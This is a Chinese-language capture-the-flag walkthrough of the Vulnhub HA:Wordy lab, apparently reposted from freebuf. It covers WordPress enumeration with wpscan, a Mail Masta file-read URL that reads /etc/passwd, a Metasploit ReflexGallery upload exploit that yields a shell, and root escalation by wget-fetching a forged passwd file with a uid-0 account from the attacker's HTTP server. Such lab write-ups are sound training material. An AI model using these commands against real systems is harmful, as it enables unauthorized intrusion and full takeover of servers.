HA:WORDY – 作者:jiangm

这是Vulnhub HA系列的一个靶场,主要考验对wpscan的使用以及wordpress插件的渗透实战,难度比较简单,适合像我这种菜鸡新手。

KALI:192.168.52.128     靶机:192.168.52.152

arp探测存活主机

确定靶机IP为192.168.52.152

1624975698_60db2952a41edd0b064a4.png!small?1624975696846

开放端口扫描

发现只开放了一个80端口

1624975704_60db2958d673ac75a7a10.png!small?1624975703317

访问网页,是一个Apache2的默认页面

1624975710_60db295e888d2ad3d17f5.png!small?1624975709006

目录扫描

使用dirb扫描目录,发现了一些东西,进行尝试之后发现都没成功

1624975716_60db2964052a081d4d833.png!small?1624975714176

1624976297_60db2ba9d00ac7ad2f634.png!small?1624976296000

1624976342_60db2bd6115fb3267942c.png!small?1624976340177

secret.zip解压需要密码

1624975731_60db29730493da29062fb.png!small?1624975729116

看来得从其他地方入手了,再次扫描目录发现wordpress

1624975812_60db29c4dd24a350e65bb.png!small?1624975811305

1624975830_60db29d6cb962c99d1974.png!small?1624975829143

给大家普及一下wpscan的 基础用法

1624975865_60db29f902a90958f431b.png!small?1624975863083

wpscan扫描

扫描用户名,获得两个用户名adminaarti

wpscan –url http://192.168.52.152/wordpress/ –enumerate u

1624975946_60db2a4a2acd192fc799e.png!small?1624975944354

查看wordpress有哪些插件,我们从插件入手

wpscan –url http://192.168.52.152/wordpress/ –enumerate p

1624975953_60db2a517e0bd1f15090e.png!small?1624975951774

Searchsploit

查看这些插件是否存在漏洞

1624975960_60db2a58224d4cb6c0fd1.png!small?1624975958302

1624975967_60db2a5f93e953f4896c1.png!small?1624975965784

1624975974_60db2a66108f7ce10f09e.png!small?1624975972162

mail masta有一个文件读取的漏洞,验证成功

http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

1624976002_60db2a8280cdf6c450359.png!small?1624976001102

1624976039_60db2aa72d2184ca44364.png!small?1624976037765

MSF

查看到reflexgallery有一个任意文件上传的漏洞,我们使用msf进行下一步攻击

use exploit/unix/webapp/wp_reflexgallery_file_upload

set rhosts 192.168.52.152

set targeturi /wordpress

1624976050_60db2ab218cce55fb872f.png!small?1624976048264

获取shell

exploit之后成功获取到shell

1624976074_60db2aca728d77fc65704.png!small?1624976072675

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’  加载tty shell外壳

在/home/raj下发现第一个flag文件

1624976083_60db2ad33159ef736aed9.png!small?1624976081400

查找suid 

find / -perm -4000 2>/dev/null

1624976090_60db2adaea2ec7143f094.png!small?1624976089243

看样子可以使用passwd文件提权

cat /etc/passwd查看密码文件

1624976096_60db2ae027167644fbc14.png!small?1624976094455

我们按照root用户的方式自己加一个账户进去,但是发现我们没有写权限,这里分几步来解决

首先将靶机的passwd文件复制下来到KALI

然后自己写一个账号加进去之后,使用简单HTTP服务器wget到靶机。

因为密码是加密的,所以我们得先使用openssl加密

openssl passwd -1 -salt jiang 123456

1624976101_60db2ae516b7bf78a6241.png!small?1624976099657

我们按照靶机root用户开始写进passwd文件,将这一句话写进我们仿造的passwd文件:jiang:$1$jiang$cUJe3FuW01A/B/Gcmn6w6/:0:0::/root:/bin/bash

1624976110_60db2aee91c8d302ffc31.png!small?1624976108760

之后我们在KALI开启HTTP服务器:python -m SimpleHTTPServer 1234

靶机使用wget下载passwd文件:

wget http://192.168.52.128:1234/passwd.1       (我这里多上传 一个,所以是passwd.1)

1624976122_60db2afae3448cdfae3f7.png!small?1624976121161

GET ROOT

我们使用下载的passwd文件替换掉原本的passwd文件,cp passwd.1 /etc/passwd

之后切换到我们设定的账户,成功提权到root用户

1624976128_60db2b005196cebe0c487.png!small?1624976126531

在/root目录下发现proof.txt

1624976131_60db2b03d8e79d61806f8.png!small?1624976130042

1624976141_60db2b0d5cf2638a0aac6.png!small?1624976139553

来源:freebuf.com 2021-06-29 22:35:27 by: jiangm

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论